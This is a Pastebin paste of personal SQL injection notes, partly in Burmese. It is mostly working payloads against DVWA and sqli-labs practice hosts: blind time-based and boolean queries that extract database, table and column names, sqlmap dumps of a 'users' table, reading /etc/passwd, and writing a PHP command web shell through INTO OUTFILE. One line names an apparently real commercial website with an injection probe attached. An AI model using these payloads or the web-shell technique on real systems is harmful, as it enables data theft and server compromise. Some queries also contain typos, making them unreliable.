Advertisement
blackhat1337

Untitled

Mar 12th, 2024
81
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 11.08 KB | None | 0 0
  1. Time base
  2. 1' AND sleep(5)--+
  3.  
  4.  
  5. Retrieve version:
  6. 1' AND if(condition,true,false)
  7. 1' and if(1=1,sleep(5),null)
  8. 1' AND IF((SELECT ascii(substr(version(),1,1))) = 53,sleep(10),NULL)--+
  9.  
  10.  
  11. Retrieve version using LIKE:
  12. 1' AND IF(((SELECT version()) LIKE "5%",sleep(10),NULL)--+
  13.  
  14. Retrieve databases:
  15. 1' AND IF(((ascii(substr((SELECT schema_name FROM information_schema.schemata LIMIT 7,1),1,1)))) = 115,sleep(10),NULL)--+ //s
  16.  
  17. 1' AND IF(((ascii(substr((SELECT schema_name FROM information_schema.schemata LIMIT 7,1),2,1)))) = 101,sleep(10),NULL)--+ //e
  18.  
  19. 1' AND IF(((ascii(substr((SELECT schema_name FROM information_schema.schemata LIMIT 7,1),3,1)))) = 99,sleep(10),NULL)--+ //c
  20.  
  21. 1' AND IF(((ascii(substr((SELECT schema_name FROM information_schema.schemata LIMIT 7,1),4,1)))) = 117,sleep(10),NULL)--+ //u
  22.  
  23.  
  24. Retrieve Tables
  25. 1' AND IF(((ascii(substr((SELECT TABLE_NAME FROM information_schema.TABLES WHERE table_schema="security" LIMIT 0,1),1,1)))) = 101 sleep(10),NULL)--+ //e
  26.  
  27. 1' AND IF(((ascii(substr((SELECT TABLE_NAME FROM information_schema.TABLES WHERE table_schema="security" LIMIT 0,1),2,1)))) = 109 sleep(10),NULL)--+ //m
  28.  
  29. 1' AND IF(((ascii(substr((SELECT TABLE_NAME FROM information_schema.TABLES WHERE table_schema="security" LIMIT 0,1),3,1)))) = 97 sleep(10),NULL)--+ //a
  30.  
  31.  
  32.  
  33.  
  34.  
  35. dvwa lab
  36.  
  37. http://192.168.100.50/vulnerabilities/sqli_blind/?id=1' and sleep(10)-- &Submit=Submit#
  38.  
  39.  
  40. 192.168.100.50/vulnerabilities/sqli_blind/?id=1' and if(1=1,sleep(5),null)-- +&Submit=Submit# << ture sleep 5 sec
  41.  
  42.  
  43.  
  44. using sqlmap get method
  45. need login(cookie >>> inspect>> Console >> document.cooke copy it
  46.  
  47. sqlmap -u "http://192.168.100.50/vulnerabilities/sqli/?id=1%27&Submit=Submit#" --current-db --cookie="PHPSESSID=vvc5vm52mes0c12pje6s286lu4; security=low"
  48.  
  49.  
  50. sqlmap -u "http://192.168.100.50/vulnerabilities/sqli/?id=1%27&Submit=Submit#" --tables -D dvwa --cookie="PHPSESSID=vvc5vm52mes0c12pje6s286lu4; security=low"
  51.  
  52.  
  53. sqlmap -u "http://192.168.100.50/vulnerabilities/sqli/?id=1%27&Submit=Submit#" --columns -T users -D dvwa --cookie="PHPSESSID=vvc5vm52mes0c12pje6s286lu4; security=low"
  54.  
  55.  
  56. sqlmap -u "http://192.168.100.50/vulnerabilities/sqli/?id=1%27&Submit=Submit#" --dump -T users -D dvwa --cookie="PHPSESSID=vvc5vm52mes0c12pje6s286lu4; security=low"
  57.  
  58.  
  59. definied parameter
  60. sqlmap -u "http://192.168.100.50/vulnerabilities/sqli/?id=1%27&Submit=Submit#" --dump -T users -D dvwa --cookie="PHPSESSID=vvc5vm52mes0c12pje6s286lu4; security=low" -p id
  61.  
  62.  
  63.  
  64. post method ( need burp)
  65.  
  66. sqlmap -u "http://192.168.100.50/vulnerabilities/sqli/" --data="id=1&Submit=Submit" --cookie="PHPSESSID=jc25hal7s1fhjl3j5402c78rc2; security=medium" --current-db
  67.  
  68.  
  69. using burp Repater>> Request အကုန်ကူး
  70. POST /vulnerabilities/sqli/ HTTP/1.1
  71. Host: 192.168.100.50
  72. User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
  73. Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
  74. Accept-Language: en-US,en;q=0.5
  75. Accept-Encoding: gzip, deflate, br
  76. Content-Type: application/x-www-form-urlencoded
  77. Content-Length: 18
  78. Origin: http://192.168.100.50
  79. Connection: close
  80. Referer: http://192.168.100.50/vulnerabilities/sqli/
  81. Cookie: PHPSESSID=jc25hal7s1fhjl3j5402c78rc2; security=medium
  82. Upgrade-Insecure-Requests: 1
  83.  
  84. id=1&Submit=Submit
  85.  
  86.  
  87. subl medium.req နဲ့ save
  88. sqlmap -r medium.req --dump -T users -D dvwa
  89.  
  90.  
  91. check outfile in sqlmap
  92. sqlmap -r medium.req --is-dba
  93.  
  94. is DBA : True (RW file)
  95.  
  96.  
  97. https://www.baizidsteel.com.bd/product_details.php?id=1'
  98.  
  99. Blind Base(boolean Base)
  100.  
  101. 1' AND 1=1-- + == True
  102. 1' AND 1=0-- + == False
  103.  
  104. for version check
  105. 1' AND (ascii(substr((select version()),1,1))) =53 -- + // 53 =5
  106. select version ဆိုတာ အများကြီးထွက်လာတဲ့ထဲက substr ဆိုပြီး အရှေ့ဆုံးတလုံးကိုပဲဖြတ်ထုတ်ပြီးပြပေးတာ
  107.  
  108.  
  109. for database lenght check
  110. 1' AND (ascii(substr((select length(databse())),1,1))) = 56--+ //56 =8
  111.  
  112.  
  113. for datbase check
  114. 1' AND (ascii(substr((select database()),1,1))) = 155 --+ //115 = s
  115. 1' AND (ascii(substr((select database()),2,1))) = 101 --+ //101 = e
  116. 1' AND (ascii(substr((select database()),3,1))) = 99 --+ //99 = c
  117. 1' AND (ascii(substr((select database()),4,1))) = 117 --+ //u
  118. 1' AND (ascii(substr((select database()),5,1))) = 114 --+ //r
  119. 1' AND (ascii(substr((select database()),6,1))) = 105 --+ //i
  120. 1' AND (ascii(substr((select database()),7,1))) = 116 --+ //t
  121. 1' AND (ascii(substr((select database()),8,1))) = 121 --+ //121 = y
  122.  
  123.  
  124. for all table count
  125. http://localhost/sqli-labs-master/less-8/?id=1' AND (ascii(substr((select count(*) form information_schema.tables where table_schema=database() limit 0,1),1,1))) =52 --+ //52 =4
  126.  
  127. Table Length check
  128. 1' AND (ascii(substr((select length(table_name) from information_schema.tables where table_schema=database() limit 0,1),1,1))) = 54 --+ //54 =6
  129.  
  130.  
  131. for table first coloums
  132. 1' AND (ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))) = 101 -- + //e
  133.  
  134. 1' AND (ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),2,1))) = 109 -- + //m
  135.  
  136.  
  137. 1' AND (ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),3,1))) = 97 -- + //a
  138.  
  139.  
  140. 1' AND (ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),4,1))) = 105 -- + //i
  141.  
  142.  
  143. 1' AND (ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),5,1))) = 108 -- + //l
  144.  
  145.  
  146. 1' AND (ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),6,1))) = 115 -- + //s
  147.  
  148.  
  149. for table second columns
  150. 1' AND (ascii(substr((select table_name form information_schema.tables where table_schema=database() limit 1,1),1,1))) =114 -- +
  151.  
  152.  
  153. for table third columns
  154. 1' AND (ascii(substr((select table_name form information_schema.tables where table_schema=database() limit 2,1),1,1))) =117 -- +
  155.  
  156. for table fourth columns length
  157. 1' AND (ascii(substr((select length(table_name) form information_schema.tables where table_schema=database() limit 3,1),1,1))) =53 -- + //5
  158.  
  159.  
  160. for table fourth columns
  161. 1' AND (ascii(substr((select table_name form information_schema.tables where table_schema=database() limit 3,1),1,1))) =117 -- + //u
  162.  
  163. 1' AND (ascii(substr((select table_name form information_schema.tables where table_schema=database() limit 3,1),2,1))) =115 -- + //s
  164.  
  165. 1' AND (ascii(substr((select table_name form information_schema.tables where table_schema=database() limit 3,1),3,1))) =101 -- + //e
  166.  
  167. 1' AND (ascii(substr((select table_name form information_schema.tables where table_schema=database() limit 3,1),4,1))) =114 -- + //r
  168.  
  169. 1' AND (ascii(substr((select table_name form information_schema.tables where table_schema=database() limit 3,1),5,1))) =115 -- + //s
  170.  
  171.  
  172. Next Column
  173. 1' AND (ascii(substr((SELECT column_name FROM information_schema.COLUMNS WHERE TABLE_NAME="users" and table_schema=database() LIMIT 0,1),1,1))) =117 -- + //u
  174.  
  175. 1' AND (ascii(substr((SELECT column_name FROM information_schema.COLUMNS WHERE TABLE_NAME="users" and table_schema=database() LIMIT 0,1),2,1))) =115 -- + //s
  176.  
  177. 1' AND (ascii(substr((SELECT column_name FROM information_schema.COLUMNS WHERE TABLE_NAME="users" and table_schema=database() LIMIT 0,1),3,1))) =101 -- + //e
  178.  
  179. 1' AND (ascii(substr((SELECT column_name FROM information_schema.COLUMNS WHERE TABLE_NAME="users" and table_schema=database() LIMIT 0,1),4,1))) =114 -- + //r
  180.  
  181. 1' AND (ascii(substr((SELECT column_name FROM information_schema.COLUMNS WHERE TABLE_NAME="users" and table_schema=database() LIMIT 0,1),5,1))) =95 -- + //_
  182.  
  183. or
  184.  
  185. 1' AND (ascii(substr((select concat(column_name)+from+information_schema.columns+where+table_name=0x7573657273 limit 3,1),1,1))) = 117 -- + //u
  186.  
  187. 1' AND (ascii(substr((select concat(column_name)+from+information_schema.columns+where+table_name=0x7573657273 limit 3,1),2,1))) = 115 -- + //s
  188.  
  189.  
  190.  
  191. >>>>>>>>>>>>>>>>>>>>>>>>>>>
  192.  
  193. dvwa lab low security
  194. http://192.168.100.50/vulnerabilities/sqli_blind/?id=1' -- +&Submit=Submit#
  195.  
  196. http://192.168.100.50/vulnerabilities/sqli_blind/?id=1' order by 2-- +&Submit=Submit#
  197.  
  198. no find vuln column
  199. http://192.168.100.50/vulnerabilities/sqli_blind/?id=1' union select 1,2-- +&Submit=Submit#
  200.  
  201. so let blind query
  202. http://192.168.100.50/vulnerabilities/sqli_blind/?id=1' AND 1=1-- +&Submit=Submit# << True
  203.  
  204. http://192.168.100.50/vulnerabilities/sqli_blind/?id=1' AND 1=2-- +&Submit=Submit# << false
  205.  
  206.  
  207. check version ( first number)
  208. http://192.168.100.50/vulnerabilities/sqli_blind/?id=1' AND (ascii(substr((select version()),1,1))) =53 -- +&Submit=Submit# << not equal 53 version
  209.  
  210. http://192.168.100.50/vulnerabilities/sqli_blind/?id=1' AND (ascii(substr((select version()),1,1))) <53 -- +&Submit=Submit# << less than 53 version true
  211.  
  212. http://192.168.100.50/vulnerabilities/sqli_blind/?id=1' AND (ascii(substr((select version()),1,1))) <48 -- +&Submit=Submit# << less than 48 version false
  213.  
  214. http://192.168.100.50/vulnerabilities/sqli_blind/?id=1' AND (ascii(substr((select version()),1,1))) =49-- &Submit=Submit# << equal 49 version
  215.  
  216.  
  217.  
  218. convert ascii
  219. https://www.duplichecker.com/ascii-to-text.php
  220. 49 >>> 1
  221.  
  222.  
  223. Second number of verion
  224.  
  225. http://192.168.100.50/vulnerabilities/sqli_blind/?id=1' AND (ascii(substr((select version()),2,1))) =49-- &Submit=Submit# << not equal 49 false
  226.  
  227. http://192.168.100.50/vulnerabilities/sqli_blind/?id=1' AND (ascii(substr((select version()),1,1))) =48-- &Submit=Submit# << equal 48 true
  228.  
  229. convert ascii
  230. 48 >>> 0
  231.  
  232.  
  233. dvwa medium security using burp
  234.  
  235. dvwa high security
  236.  
  237.  
  238. SQL injection file write requirement
  239. 1. Web server's file path
  240. 2. permission
  241. 3. db user write permission
  242.  
  243.  
  244. load file & file_priv check
  245. group_concat(user,0x3a,file_priv) from mysql.user
  246.  
  247. http://192.168.100.50/vulnerabilities/sqli/?id=1' union select user(),group_concat(user,0x3a,file_priv) from mysql.user--+&Submit=Submit#
  248.  
  249. http://192.168.100.50/vulnerabilities/sqli/?id=1' union select user(),load_file('/etc/passwd')--+&Submit=Submit#
  250.  
  251. upload phpfile
  252. http://192.168.100.50/vulnerabilities/sqli/?id=1' union select user(),'<?php phpinfo();?>' into outfile '/var/www/html/test/phpinfo.php'--+&Submit=Submit#
  253.  
  254. shell access (into outfile)
  255. http://192.168.100.50/vulnerabilities/sqli/?id=1' union select user(),'<?php system($_GET["cmd"]);?>' into outfile '/var/www/html/test/cmd.php'--+&Submit=Submit#
  256.  
  257. http://192.168.100.50/test/cmd.php?cmd=ls -al ../../
  258.  
  259. Mysql Database Update
  260.  
  261. default login
  262. sudo mysql
  263.  
  264. change password
  265. SET PASSWORD FOR 'root'@'localhost' = PASSWORD('mypass');
  266.  
  267. try update pass working
  268. mysql -u root -p
  269.  
  270. create database
  271. create database dvwa;
  272.  
  273. Show Database
  274. show databases;
  275.  
  276. Select or use database
  277. use dvwa;
  278.  
  279. Show table
  280. show tables;
  281.  
  282. dump tables
  283. select * from users;
  284.  
  285. select * from users where user='admin':
  286.  
  287.  
  288. update password user 1337 in db
  289. update users set password=md5('1337') where user="1337";
  290.  
  291.  
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement